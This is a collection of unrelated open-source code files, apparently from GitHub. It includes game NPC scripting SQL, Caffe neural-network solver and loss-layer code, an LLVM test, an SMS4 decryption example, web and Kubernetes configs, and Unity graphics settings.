(1157,0,2, 'A living $R... soon to be a dead like me.',12,0,100,0,0,0, 'Cursed Sailor - Aggro Random Say'),
(1158,0,0, 'Time to join us, $C.',12,0,100,0,0,0, 'Cursed Marine - Aggro Random Say'),
(1158,0,1, 'Brains...',12,0,100,0,0,0, 'Cursed Marine - Aggro Random Say'),
(1158,0,2, 'A living $R... soon to be a dead like me.',12,0,100,0,0,0, 'Cursed Marine - Aggro Random Say'),
(1160,0,0, 'Time to join us, $C.',12,0,100,0,0,0, 'Captain Halyndor - Aggro Random Say'),
(1160,0,1, 'Brains...',12,0,100,0,0,0, 'Captain Halyndor - Aggro Random Say'),
(1160,0,2, 'A living $R... soon to be a dead like me.',12,0,100,0,0,0, 'Captain Halyndor - Aggro Random Say');
-- SAI for Mottled Screecher
SET @ENTRY := 1021;
UPDATE `creature_template` SET `AIName`='SmartAI' WHERE `entry`=@ENTRY;
-- DELETE FROM `creature_ai_scripts` WHERE `creature_id`=@ENTRY;
DELETE FROM `smart_scripts` WHERE `source_type`=0 AND `entryorguid`=@ENTRY;
-- At 20% HP: action 39 (call for help in 20 yd), linked row says the emote text.
INSERT INTO `smart_scripts` (`entryorguid`,`source_type`,`id`,`link`,`event_type`,`event_phase_mask`,`event_chance`,`event_flags`,`event_param1`,`event_param2`,`event_param3`,`event_param4`,`action_type`,`action_param1`,`action_param2`,`action_param3`,`action_param4`,`action_param5`,`action_param6`,`target_type`,`target_param1`,`target_param2`,`target_param3`,`target_x`,`target_y`,`target_z`,`target_o`,`comment`) VALUES
(@ENTRY,0,0,1,2,0,100,1,0,20,0,0,39,20,0,0,0,0,0,0,0,0,0,0,0,0,0, 'Mottled Screecher - HP@20% - Call for help'),
(@ENTRY,0,1,0,61,0,100,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0, 'Mottled Screecher - HP@20% - Say text');
-- NPC talk text convert from creature_ai_text
-- DELETE FROM `creature_ai_texts` WHERE `entry` IN (-100);
DELETE FROM `creature_text` WHERE `entry` IN (1021);
-- type 16 = boss emote; %s is replaced with the creature name.
INSERT INTO `creature_text` (`entry`,`groupid`,`id`,`text`,`type`,`language`,`probability`,`emote`,`duration`,`sound`,`comment`) VALUES
(1021,0,0, '%s lets out a high pitched screech, calling for help!',16,0,100,0,0,0, 'Mottled Screecher - Call for help Say');
-- SAI for Spectral Stable Hand
SET @ENTRY := 15551;
UPDATE `creature_template` SET `AIName`='SmartAI' WHERE `entry`=@ENTRY;
-- DELETE FROM `creature_ai_scripts` WHERE `creature_id`=@ENTRY;
DELETE FROM `smart_scripts` WHERE `source_type`=0 AND `entryorguid`=@ENTRY;
-- Timed combat casts (Knockdown, Pierce Armor); on friendly HP event, heal the
-- ally and (linked row) cast Whip Frenzy on it; says a random text on death.
INSERT INTO `smart_scripts` (`entryorguid`,`source_type`,`id`,`link`,`event_type`,`event_phase_mask`,`event_chance`,`event_flags`,`event_param1`,`event_param2`,`event_param3`,`event_param4`,`action_type`,`action_param1`,`action_param2`,`action_param3`,`action_param4`,`action_param5`,`action_param6`,`target_type`,`target_param1`,`target_param2`,`target_param3`,`target_x`,`target_y`,`target_z`,`target_o`,`comment`) VALUES
(@ENTRY,0,0,0,0,0,100,2,7000,7000,15000,15000,11,18812,0,0,0,0,0,2,0,0,0,0,0,0,0, 'Spectral Stable Hand - Combat - Cast Knockdown'),
(@ENTRY,0,1,0,0,0,100,2,4000,4000,45000,45000,11,6016,0,0,0,0,0,2,0,0,0,0,0,0,0, 'Spectral Stable Hand - Combat - Cast Pierce Armor'),
(@ENTRY,0,2,3,14,0,100,3,38400,40,60000,60000,11,29339,0,0,0,0,0,7,0,0,0,0,0,0,0, 'Spectral Stable Hand - Combat - Cast Healing Touch on Ally'),
(@ENTRY,0,3,0,61,0,100,0,0,0,0,0,11,29340,0,0,0,0,0,7,0,0,0,0,0,0,0, 'Spectral Stable Hand - Combat - Cast Whip Frenzy on Ally'),
(@ENTRY,0,4,0,6,0,100,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0, 'Spectral Stable Hand - On Death - Say text');
-- NPC talk text convert from creature_ai_text
-- DELETE FROM `creature_ai_texts` WHERE `entry` IN (-40,-41);
DELETE FROM `creature_text` WHERE `entry` IN (15551);
INSERT INTO `creature_text` (`entry`,`groupid`,`id`,`text`,`type`,`language`,`probability`,`emote`,`duration`,`sound`,`comment`) VALUES
(15551,0,0, 'Is this the end?',14,0,100,0,0,0, 'Spectral Stable Hand - On Death Say'),
(15551,0,1, 'What will become of...',12,0,100,0,0,0, 'Spectral Stable Hand - On Death Say');
| {
"pile_set_name": "Github"
} |
#ifndef CAFFE_SGD_SOLVERS_HPP_
#define CAFFE_SGD_SOLVERS_HPP_
#include <string>
#include <vector>
#include "caffe/solver.hpp"
namespace caffe {
/**
 * @brief Optimizes the parameters of a Net using
 *        stochastic gradient descent (SGD) with momentum.
 */
template <typename Dtype>
class SGDSolver : public Solver<Dtype> {
 public:
  explicit SGDSolver(const SolverParameter& param)
      : Solver<Dtype>(param) { PreSolve(); }
  explicit SGDSolver(const string& param_file)
      : Solver<Dtype>(param_file) { PreSolve(); }
  virtual inline const char* type() const { return "SGD"; }

  /// Read-only access to the per-parameter momentum history blobs.
  const vector<shared_ptr<Blob<Dtype> > >& history() { return history_; }

 protected:
  /// Allocates history_/update_/temp_ to mirror the net's learnable params.
  void PreSolve();
  /// Returns the current learning rate according to the configured lr policy.
  Dtype GetLearningRate();
  virtual void ApplyUpdate();
  virtual void Normalize(int param_id);
  virtual void Regularize(int param_id);
  virtual void ComputeUpdateValue(int param_id, Dtype rate);
  virtual void ClipGradients();
  virtual void SnapshotSolverState(const string& model_filename);
  virtual void SnapshotSolverStateToBinaryProto(const string& model_filename);
  virtual void SnapshotSolverStateToHDF5(const string& model_filename);
  virtual void RestoreSolverStateFromHDF5(const string& state_file);
  virtual void RestoreSolverStateFromBinaryProto(const string& state_file);
  // history maintains the historical momentum data.
  // update maintains update related data and is not needed in snapshots.
  // temp maintains other information that might be needed in computation
  // of gradients/updates and is not needed in snapshots
  vector<shared_ptr<Blob<Dtype> > > history_, update_, temp_;

  DISABLE_COPY_AND_ASSIGN(SGDSolver);
};
/**
 * @brief SGD variant using Nesterov's accelerated gradient: the momentum
 *        step is applied before evaluating the gradient correction.
 */
template <typename Dtype>
class NesterovSolver : public SGDSolver<Dtype> {
 public:
  explicit NesterovSolver(const SolverParameter& param)
      : SGDSolver<Dtype>(param) {}
  explicit NesterovSolver(const string& param_file)
      : SGDSolver<Dtype>(param_file) {}
  virtual inline const char* type() const { return "Nesterov"; }

 protected:
  virtual void ComputeUpdateValue(int param_id, Dtype rate);

  DISABLE_COPY_AND_ASSIGN(NesterovSolver);
};
/**
 * @brief SGD variant with per-parameter adaptive learning rates (AdaGrad);
 *        incompatible with momentum, which is rejected at construction.
 */
template <typename Dtype>
class AdaGradSolver : public SGDSolver<Dtype> {
 public:
  explicit AdaGradSolver(const SolverParameter& param)
      : SGDSolver<Dtype>(param) { constructor_sanity_check(); }
  explicit AdaGradSolver(const string& param_file)
      : SGDSolver<Dtype>(param_file) { constructor_sanity_check(); }
  virtual inline const char* type() const { return "AdaGrad"; }

 protected:
  virtual void ComputeUpdateValue(int param_id, Dtype rate);
  // Fails fast if the solver parameters conflict with the AdaGrad algorithm.
  void constructor_sanity_check() {
    CHECK_EQ(0, this->param_.momentum())
        << "Momentum cannot be used with AdaGrad.";
  }

  DISABLE_COPY_AND_ASSIGN(AdaGradSolver);
};
/**
 * @brief RMSProp solver: scales updates by a decaying average of squared
 *        gradients. Requires 0 <= rms_decay < 1 and no momentum.
 */
template <typename Dtype>
class RMSPropSolver : public SGDSolver<Dtype> {
 public:
  explicit RMSPropSolver(const SolverParameter& param)
      : SGDSolver<Dtype>(param) { constructor_sanity_check(); }
  explicit RMSPropSolver(const string& param_file)
      : SGDSolver<Dtype>(param_file) { constructor_sanity_check(); }
  virtual inline const char* type() const { return "RMSProp"; }

 protected:
  virtual void ComputeUpdateValue(int param_id, Dtype rate);
  // Fails fast if the solver parameters conflict with the RMSProp algorithm.
  void constructor_sanity_check() {
    CHECK_EQ(0, this->param_.momentum())
        << "Momentum cannot be used with RMSProp.";
    CHECK_GE(this->param_.rms_decay(), 0)
        << "rms_decay should lie between 0 and 1.";
    CHECK_LT(this->param_.rms_decay(), 1)
        << "rms_decay should lie between 0 and 1.";
  }

  DISABLE_COPY_AND_ASSIGN(RMSPropSolver);
};
/**
 * @brief AdaDelta solver: AdaGrad-style adaptation using a window of
 *        accumulated squared gradients and squared updates.
 */
template <typename Dtype>
class AdaDeltaSolver : public SGDSolver<Dtype> {
 public:
  explicit AdaDeltaSolver(const SolverParameter& param)
      : SGDSolver<Dtype>(param) { AdaDeltaPreSolve(); }
  explicit AdaDeltaSolver(const string& param_file)
      : SGDSolver<Dtype>(param_file) { AdaDeltaPreSolve(); }
  virtual inline const char* type() const { return "AdaDelta"; }

 protected:
  // Allocates the extra accumulator blobs AdaDelta needs on top of SGD state.
  void AdaDeltaPreSolve();
  virtual void ComputeUpdateValue(int param_id, Dtype rate);

  DISABLE_COPY_AND_ASSIGN(AdaDeltaSolver);
};
/**
 * @brief AdamSolver, an algorithm for first-order gradient-based optimization
 *        of stochastic objective functions, based on adaptive estimates of
 *        lower-order moments. Described in [1].
 *
 * [1] D. P. Kingma and J. L. Ba, "ADAM: A Method for Stochastic Optimization."
 *     arXiv preprint arXiv:1412.6980v8 (2014).
 */
template <typename Dtype>
class AdamSolver : public SGDSolver<Dtype> {
 public:
  explicit AdamSolver(const SolverParameter& param)
      : SGDSolver<Dtype>(param) { AdamPreSolve(); }
  explicit AdamSolver(const string& param_file)
      : SGDSolver<Dtype>(param_file) { AdamPreSolve(); }
  virtual inline const char* type() const { return "Adam"; }

 protected:
  // Allocates the first/second moment estimate blobs used by Adam.
  void AdamPreSolve();
  virtual void ComputeUpdateValue(int param_id, Dtype rate);

  DISABLE_COPY_AND_ASSIGN(AdamSolver);
};
} // namespace caffe
#endif // CAFFE_SGD_SOLVERS_HPP_
| {
"pile_set_name": "Github"
} |
; RUN: llc < %s
; PR4975
; Regression test: codegen must not crash when storing a zero-size by-value
; aggregate argument (a packed struct containing [0 x i32]) through a
; bitcast pointer to an empty union slot.

%0 = type <{ [0 x i32] }>
%union.T0 = type { }

@.str = private constant [1 x i8] c" "

define void @t(%0) nounwind {
entry:
  %arg0 = alloca %union.T0
  %1 = bitcast %union.T0* %arg0 to %0*
  store %0 %0, %0* %1, align 1
  ret void
}

declare i32 @printf(i8*, ...)
| {
"pile_set_name": "Github"
} |
#include <algorithm>
#include <cfloat>
#include <vector>
#include "caffe/layers/softmax_loss_layer.hpp"
#include "caffe/util/math_functions.hpp"
namespace caffe {
template <typename Dtype>
void SoftmaxWithLossLayer<Dtype>::LayerSetUp(
    const vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) {
  LossLayer<Dtype>::LayerSetUp(bottom, top);
  // Build an internal Softmax layer that maps bottom[0] (raw scores) to the
  // probability blob prob_; this layer owns and drives it directly.
  LayerParameter softmax_param(this->layer_param_);
  softmax_param.set_type("Softmax");
  softmax_layer_ = LayerRegistry<Dtype>::CreateLayer(softmax_param);
  softmax_bottom_vec_.clear();
  softmax_bottom_vec_.push_back(bottom[0]);
  softmax_top_vec_.clear();
  softmax_top_vec_.push_back(&prob_);
  softmax_layer_->SetUp(softmax_bottom_vec_, softmax_top_vec_);

  // Optional label value that is excluded from both the loss and the gradient.
  has_ignore_label_ =
    this->layer_param_.loss_param().has_ignore_label();
  if (has_ignore_label_) {
    ignore_label_ = this->layer_param_.loss_param().ignore_label();
  }
  // Backward compatibility: the deprecated boolean "normalize" field maps to
  // VALID (true) / BATCH_SIZE (false) unless "normalization" is set explicitly.
  if (!this->layer_param_.loss_param().has_normalization() &&
      this->layer_param_.loss_param().has_normalize()) {
    normalization_ = this->layer_param_.loss_param().normalize() ?
                     LossParameter_NormalizationMode_VALID :
                     LossParameter_NormalizationMode_BATCH_SIZE;
  } else {
    normalization_ = this->layer_param_.loss_param().normalization();
  }
}
template <typename Dtype>
void SoftmaxWithLossLayer<Dtype>::Reshape(
    const vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) {
  LossLayer<Dtype>::Reshape(bottom, top);
  softmax_layer_->Reshape(softmax_bottom_vec_, softmax_top_vec_);
  // Split the blob around the softmax axis: outer_num_ iterates everything
  // before the axis (e.g. batch), inner_num_ everything after (e.g. H*W).
  softmax_axis_ =
      bottom[0]->CanonicalAxisIndex(this->layer_param_.softmax_param().axis());
  outer_num_ = bottom[0]->count(0, softmax_axis_);
  inner_num_ = bottom[0]->count(softmax_axis_ + 1);
  // One integer label is expected per spatial position per sample.
  CHECK_EQ(outer_num_ * inner_num_, bottom[1]->count())
      << "Number of labels must match number of predictions; "
      << "e.g., if softmax axis == 1 and prediction shape is (N, C, H, W), "
      << "label count (number of labels) must be N*H*W, "
      << "with integer values in {0, 1, ..., C-1}.";
  if (top.size() >= 2) {
    // softmax output
    top[1]->ReshapeLike(*bottom[0]);
  }
}
template <typename Dtype>
void SoftmaxWithLossLayer<Dtype>::Forward_cpu(
    const vector<Blob<Dtype>*>& bottom, const vector<Blob<Dtype>*>& top) {
  // The forward pass computes the softmax prob values.
  softmax_layer_->Forward(softmax_bottom_vec_, softmax_top_vec_);
  const Dtype* prob_data = prob_.cpu_data();
  const Dtype* label = bottom[1]->cpu_data();
  int dim = prob_.count() / outer_num_;
  int count = 0;  // number of positions actually contributing to the loss
  Dtype loss = 0;
  for (int i = 0; i < outer_num_; ++i) {
    for (int j = 0; j < inner_num_; j++) {
      const int label_value = static_cast<int>(label[i * inner_num_ + j]);
      if (has_ignore_label_ && label_value == ignore_label_) {
        continue;  // ignored positions contribute neither loss nor count
      }
      DCHECK_GE(label_value, 0);
      DCHECK_LT(label_value, prob_.shape(softmax_axis_));
      // Cross-entropy: -log(p[label]); clamp at FLT_MIN to avoid log(0).
      loss -= log(std::max(prob_data[i * dim + label_value * inner_num_ + j],
                           Dtype(FLT_MIN)));
      ++count;
    }
  }
  // Normalize by the configured mode (VALID uses `count`, i.e. non-ignored).
  Dtype normalizer = LossLayer<Dtype>::GetNormalizer(
      normalization_, outer_num_, inner_num_, count);
  top[0]->mutable_cpu_data()[0] = loss / normalizer;
  if (top.size() == 2) {
    top[1]->ShareData(prob_);  // optionally expose the softmax output
  }
}
template <typename Dtype>
void SoftmaxWithLossLayer<Dtype>::Backward_cpu(const vector<Blob<Dtype>*>& top,
    const vector<bool>& propagate_down, const vector<Blob<Dtype>*>& bottom) {
  // Labels are discrete targets; there is no meaningful gradient for them.
  if (propagate_down[1]) {
    LOG(FATAL) << this->type()
               << " Layer cannot backpropagate to label inputs.";
  }
  if (propagate_down[0]) {
    Dtype* bottom_diff = bottom[0]->mutable_cpu_diff();
    const Dtype* prob_data = prob_.cpu_data();
    // Gradient of softmax + cross-entropy w.r.t. the logits is
    // (prob - one_hot(label)): start from prob and subtract 1 at the label.
    caffe_copy(prob_.count(), prob_data, bottom_diff);
    const Dtype* label = bottom[1]->cpu_data();
    int dim = prob_.count() / outer_num_;
    int count = 0;
    for (int i = 0; i < outer_num_; ++i) {
      for (int j = 0; j < inner_num_; ++j) {
        const int label_value = static_cast<int>(label[i * inner_num_ + j]);
        if (has_ignore_label_ && label_value == ignore_label_) {
          // Zero the whole channel column so ignored positions get no gradient.
          for (int c = 0; c < bottom[0]->shape(softmax_axis_); ++c) {
            bottom_diff[i * dim + c * inner_num_ + j] = 0;
          }
        } else {
          bottom_diff[i * dim + label_value * inner_num_ + j] -= 1;
          ++count;
        }
      }
    }
    // Scale gradient
    Dtype normalizer = LossLayer<Dtype>::GetNormalizer(
        normalization_, outer_num_, inner_num_, count);
    Dtype loss_weight = top[0]->cpu_diff()[0] / normalizer;
    caffe_scal(prob_.count(), loss_weight, bottom_diff);
  }
}
#ifdef CPU_ONLY
STUB_GPU(SoftmaxWithLossLayer);
#endif
INSTANTIATE_CLASS(SoftmaxWithLossLayer);
REGISTER_LAYER_CLASS(SoftmaxWithLoss);
} // namespace caffe
| {
"pile_set_name": "Github"
} |
/*******************************************************************************
* Copyright 2020 Intel Corporation
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*******************************************************************************/
/*!
*
* \file
*
* \brief SMS4 Cipher Block Chaining mode of operation (CBC) example
*
* This example demonstrates usage of SMS4 block cipher
* run with CBC mode of operation. Decryption scheme.
*
* The CBC mode of operation is implemented according to the
* "NIST Special Publication 800-38A: Recommendation for Block Cipher Modes of
* Operation" document:
*
* https://csrc.nist.gov/publications/detail/sp/800-38a/final
*
*/
#include <string.h>
#include "ippcp.h"
#include "examples_common.h"
/*! SMS4 block size in bytes */
static const int SMS4_BLOCK_SIZE = 16;

/*! Key size in bytes */
static const int KEY_SIZE = 16;

/*! Message size in bytes */
static const int SRC_LEN = 16;

/*! Plain text (reference value used to validate the decryption result) */
static Ipp8u plainText[SRC_LEN] = {
    0xAA,0xAA,0xAA,0xAA,0xBB,0xBB,0xBB,0xBB,
    0xCC,0xCC,0xCC,0xCC,0xDD,0xDD,0xDD,0xDD
};

/*! Cipher text (input to be decrypted) */
static Ipp8u cipherText[SRC_LEN] = {
    0x78,0xEB,0xB1,0x1C,0xC4,0x0B,0x0A,0x48,
    0x31,0x2A,0xAE,0xB2,0x04,0x02,0x44,0xCB
};

/*! 128-bit secret key */
static Ipp8u key[KEY_SIZE] = {
    0x01,0x23,0x45,0x67,0x89,0xAB,0xCD,0xEF,
    0xFE,0xDC,0xBA,0x98,0x76,0x54,0x32,0x10
};

/*! Initialization vector for CBC mode.
 *  Size of initialization vector for SMS4-CBC shall be equal to the size of SMS4 block (16 bytes).
 */
static Ipp8u iv[SMS4_BLOCK_SIZE] = {
    0x00,0x01,0x02,0x03,0x04,0x05,0x06,0x07,
    0x08,0x09,0x0A,0x0B,0x0C,0x0D,0x0E,0x0F
};

/*! Main function: decrypts cipherText with SMS4-CBC and checks the result
 *  against plainText. Returns 0 on success, a non-zero status on failure. */
int main(void)
{
    /* Size of SMS4 context structure. It will be set up in ippsSMS4GetSize(). */
    int ctxSize = 0;

    Ipp8u pOut[SRC_LEN] = {};

    /* Internal function status */
    IppStatus status = ippStsNoErr;

    /* Pointer to SMS4 context structure */
    IppsSMS4Spec* pSMS4 = 0;

    /* do/while(0) gives a single exit path so cleanup below always runs */
    do {
        /* 1. Get size needed for SMS4 context structure */
        status = ippsSMS4GetSize(&ctxSize);
        if (!checkStatus("ippsSMS4GetSize", ippStsNoErr, status))
            return status;

        /* 2. Allocate memory for SMS4 context structure */
        pSMS4 = (IppsSMS4Spec*)(new Ipp8u[ctxSize]);
        if (NULL == pSMS4) {
            printf("ERROR: Cannot allocate memory (%d bytes) for SMS4 context\n", ctxSize);
            return -1;
        }

        /* 3. Initialize SMS4 context */
        status = ippsSMS4Init(key, sizeof(key), pSMS4, ctxSize);
        if (!checkStatus("ippsSMS4Init", ippStsNoErr, status))
            break;

        /* 4. Decryption */
        status = ippsSMS4DecryptCBC(cipherText, pOut, sizeof(cipherText), pSMS4, iv);
        if (!checkStatus("ippsSMS4DecryptCBC", ippStsNoErr, status))
            break;

        /* Compare decrypted message and reference text */
        if (0 != memcmp(pOut, plainText, sizeof(plainText))) {
            printf("ERROR: Decrypted and reference messages do not match\n");
            break;
        }
    } while (0);

    /* 5. Remove secret and release resources: re-initializing with a null key
     * wipes the expanded key material from the context before freeing it. */
    ippsSMS4Init(0, KEY_SIZE, pSMS4, ctxSize);
    if (pSMS4) delete [] (Ipp8u*)pSMS4;

    PRINT_EXAMPLE_STATUS("ippsSMS4DecryptCBC", "SMS4-CBC Decryption", !status)

    return status;
}
| {
"pile_set_name": "Github"
} |
<?php
/**
 * View: Top Bar Navigation Previous Template
 *
 * Renders the "previous day" caret link in the Day view top bar. The anchor is
 * emitted even when $prev_url is empty; JS handles navigation via the
 * tribe-events-view-link hook.
 *
 * Override this template in your own theme by creating a file at:
 * [your-theme]/tribe/events/v2/day/top-bar/nav/prev.php
 *
 * See more documentation about our views templating system.
 *
 * @link http://m.tri.be/1aiy
 *
 * @var string $prev_url The URL to the previous page, if any, or an empty string.
 *
 * @version 5.0.1
 */
?>
<li class="tribe-events-c-top-bar__nav-list-item">
	<a
		href="<?php echo esc_url( $prev_url ); ?>"
		class="tribe-common-c-btn-icon tribe-common-c-btn-icon--caret-left tribe-events-c-top-bar__nav-link tribe-events-c-top-bar__nav-link--prev"
		aria-label="<?php esc_attr_e( 'Previous day', 'the-events-calendar' ); ?>"
		title="<?php esc_attr_e( 'Previous day', 'the-events-calendar' ); ?>"
		data-js="tribe-events-view-link"
	>
	</a>
</li>
| {
"pile_set_name": "Github"
} |
---
# ReplicationController running three replicas of the env-show sample app.
apiVersion: v1
kind: ReplicationController
metadata:
  name: show-rc
  labels:
    type: show-type
spec:
  replicas: 3
  template:
    metadata:
      labels:
        # Must match the RC's selector (defaulted from these labels).
        type: show-type
    spec:
      containers:
      - name: show-container
        image: gcr.io/google-samples/env-show:1.1
        imagePullPolicy: Always
        ports:
        - containerPort: 8080
          protocol: TCP
        env:
        # Static value injected directly.
        - name: USER_VAR
          value: important information
        # Downward API: expose the pod's own name and namespace to the app.
        - name: POD_NAME
          valueFrom:
            fieldRef:
              fieldPath: metadata.name
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
"pile_set_name": "Github"
} |
var path = require('path')
var utils = require('./utils')
var config = require('../config')
var vueLoaderConfig = require('./vue-loader.conf')
function resolve (dir) {
return path.join(__dirname, '..', dir)
}
module.exports = {
entry: {
app: './src/main.js'
},
output: {
path: config.build.assetsRoot,
filename: '[name].js',
publicPath: process.env.NODE_ENV === 'production'
? config.build.assetsPublicPath
: config.dev.assetsPublicPath
},
resolve: {
extensions: ['.js', '.vue', '.json'],
alias: {
'vue$': 'vue/dist/vue.esm.js',
'@': resolve('src'),
}
},
module: {
rules: [
{
test: /\.vue$/,
loader: 'vue-loader',
options: vueLoaderConfig
},
{
test: /\.js$/,
loader: 'babel-loader',
include: [resolve('src'), resolve('test')]
},
{
test: /\.(png|jpe?g|gif|svg)(\?.*)?$/,
loader: 'url-loader',
query: {
limit: 10000,
name: utils.assetsPath('img/[name].[hash:7].[ext]')
}
},
{
test: /\.(woff2?|eot|ttf|otf)(\?.*)?$/,
loader: 'url-loader',
query: {
limit: 10000,
name: utils.assetsPath('fonts/[name].[hash:7].[ext]')
}
}
]
}
}
| {
"pile_set_name": "Github"
} |
.*
| {
"pile_set_name": "Github"
} |
# Cloud Monitoring notification channel of type "email".
resource "google_monitoring_notification_channel" "<%= ctx[:primary_resource_id] %>" {
  display_name = "<%= ctx[:vars]["display_name"] %>"
  type = "email"

  # Channel-type-specific configuration; for "email" the expected key
  # is email_address.
  labels = {
    email_address = "[email protected]"
  }
}
| {
"pile_set_name": "Github"
} |
# Module exercising name resolution across scopes (global, function-local,
# nested class). NOTE(review): the deliberately generic names (a_global,
# a_local, func_bar) suggest this is a test fixture whose identifiers are
# asserted elsewhere — do not rename.

# Module-level name read by the functions below.
a_global = "A global var"


def foo():
    # Side-effect only: prints a fixed string.
    print("foo")


def func_foo():
    # Combines a function-local binding with the module-level global.
    a_local = "A local var"
    return a_local + a_global


class outer_class():
    class inner_class:
        @staticmethod
        def func_bar():
            # Same local+global combination, but resolved from inside a
            # doubly-nested class body.
            a_local = "A local var"
            return a_local + a_global
| {
"pile_set_name": "Github"
} |
import React from 'react';
import Head from 'next/head';
import PropTypes from 'prop-types';
import 'antd/dist/antd.css';

import wrapper from '../store/configureStore';

// Custom Next.js App component: applies the global antd stylesheet and the
// shared <Head> metadata to every page, and is connected to the Redux store
// below via next-redux-wrapper.
const NodeBird = ({ Component }) => {
  return (
    <>
      <Head>
        <title>NodeBird</title>
      </Head>
      {/* Component is the page Next.js is currently rendering. */}
      <Component />
    </>
  );
};

NodeBird.propTypes = {
  // The active page component supplied by Next.js.
  Component: PropTypes.elementType.isRequired,
};

export default wrapper.withRedux(NodeBird);
| {
"pile_set_name": "Github"
} |
package org.zalando.riptide;
import org.apiguardian.api.API;
import java.util.function.Supplier;
import static com.google.common.base.Suppliers.memoize;
import static com.google.common.collect.ObjectArrays.concat;
import static org.apiguardian.api.API.Status.STABLE;
import static org.zalando.fauxpas.FauxPas.partially;
/**
 * Preserves the original stack traces of failed requests. Requests in Riptide are executed asynchronously by default.
 * That has the unfortunate side-effect that stack traces from exceptions that happen when processing the response will
 * not contain everything that is needed to trace back to the caller.
 * <p>
 * This plugin will modify the stack trace of any thrown exception and appending the stack trace elements of the
 * original stack trace
 */
@API(status = STABLE)
public final class OriginalStackTracePlugin implements Plugin {

    /**
     * {@link Attribute} that allows to access the original stack trace, i.e. the stack trace from the calling thread.
     */
    public static final Attribute<Supplier<StackTraceElement[]>> STACK = Attribute.generate();

    @Override
    public RequestExecution aroundAsync(final RequestExecution execution) {
        return arguments -> {
            // Capture the caller's stack lazily before the async hand-off.
            final Supplier<StackTraceElement[]> original = keepOriginalStackTrace();

            return execution.execute(arguments.withAttribute(STACK, original))
                    .exceptionally(partially(cause -> {
                        // Append the caller's frames to the async exception and rethrow.
                        cause.setStackTrace(join(cause, original.get()));
                        throw cause;
                    }));
        };
    }

    /** Concatenates the exception's own frames with the original caller frames. */
    private StackTraceElement[] join(final Throwable throwable, final StackTraceElement[] original) {
        return concat(throwable.getStackTrace(), original, StackTraceElement.class);
    }

    /**
     * A good way to store a stacktrace away efficiently is to simply construct an exception. Later, if you
     * want to inspect the stacktrace call exception.getStackTrace() which will do the slow work of
     * resolving the stack frames to methods.
     * <p>
     * <a href="http://stackoverflow.com/a/4377609/232539>What is the proper way to keep track of the original stack trace in a newly created Thread?</a>
     */
    @SuppressWarnings("ThrowableInstanceNeverThrown")
    private Supplier<StackTraceElement[]> keepOriginalStackTrace() {
        return memoize(new Exception()::getStackTrace);
    }
}
| {
"pile_set_name": "Github"
} |
//
// GTRepository+Blame.h
// ObjectiveGitFramework
//
// Created by Ezekiel Pierson on 2/5/14.
// Copyright (c) 2014 GitHub, Inc. All rights reserved.
//
#import <Foundation/Foundation.h>
#import "GTRepository.h"
#import "git2/blame.h"
@class GTBlame;
/// Enum for options passed to the dictionary in `-blameWithFile:inRepository:options:`
///
/// For flag documentation see `blame.h`.
typedef NS_OPTIONS(NSInteger, GTBlameOptions) {
	GTBlameOptionsNormal = GIT_BLAME_NORMAL,
};

/// A `NSNumber` wrapped `GTBlameOptions`. Flags are documented above.
extern NSString * const GTBlameOptionsFlags;

/// A `GTOID` determining the newest commit to consider.
/// Default is HEAD.
extern NSString * const GTBlameOptionsNewestCommitOID;

/// A `GTOID` determining the oldest commit to consider.
/// Default is the first commit without a parent.
extern NSString * const GTBlameOptionsOldestCommitOID;

/// The first line in the file to blame. Default is 1.
extern NSString * const GTBlameOptionsFirstLine;

/// The last line in the file to blame. Default is the last line.
extern NSString * const GTBlameOptionsLastLine;

/// Category adding blame support to GTRepository.
@interface GTRepository (Blame)

/// Create a blame for a file, with options.
///
/// path    - Path for the file to examine. Can't be nil
/// options - A dictionary consisting of the above keys. May be nil.
/// error   - Populated with an `NSError` object on error.
///
/// Returns a new `GTBlame` object or nil if an error occurred.
- (GTBlame *)blameWithFile:(NSString *)path options:(NSDictionary *)options error:(NSError **)error;

@end
| {
"pile_set_name": "Github"
} |
%YAML 1.1
%TAG !u! tag:unity3d.com,2011:
--- !u!30 &1
GraphicsSettings:
m_ObjectHideFlags: 0
serializedVersion: 12
m_Deferred:
m_Mode: 1
m_Shader: {fileID: 69, guid: 0000000000000000f000000000000000, type: 0}
m_DeferredReflections:
m_Mode: 1
m_Shader: {fileID: 74, guid: 0000000000000000f000000000000000, type: 0}
m_ScreenSpaceShadows:
m_Mode: 1
m_Shader: {fileID: 64, guid: 0000000000000000f000000000000000, type: 0}
m_LegacyDeferred:
m_Mode: 1
m_Shader: {fileID: 63, guid: 0000000000000000f000000000000000, type: 0}
m_DepthNormals:
m_Mode: 1
m_Shader: {fileID: 62, guid: 0000000000000000f000000000000000, type: 0}
m_MotionVectors:
m_Mode: 1
m_Shader: {fileID: 75, guid: 0000000000000000f000000000000000, type: 0}
m_LightHalo:
m_Mode: 1
m_Shader: {fileID: 105, guid: 0000000000000000f000000000000000, type: 0}
m_LensFlare:
m_Mode: 1
m_Shader: {fileID: 102, guid: 0000000000000000f000000000000000, type: 0}
m_AlwaysIncludedShaders:
- {fileID: 7, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 15104, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 15105, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 15106, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 10753, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 10770, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 16000, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 17000, guid: 0000000000000000f000000000000000, type: 0}
- {fileID: 16002, guid: 0000000000000000f000000000000000, type: 0}
m_PreloadedShaders: []
m_SpritesDefaultMaterial: {fileID: 10754, guid: 0000000000000000f000000000000000,
type: 0}
m_CustomRenderPipeline: {fileID: 0}
m_TransparencySortMode: 0
m_TransparencySortAxis: {x: 0, y: 0, z: 1}
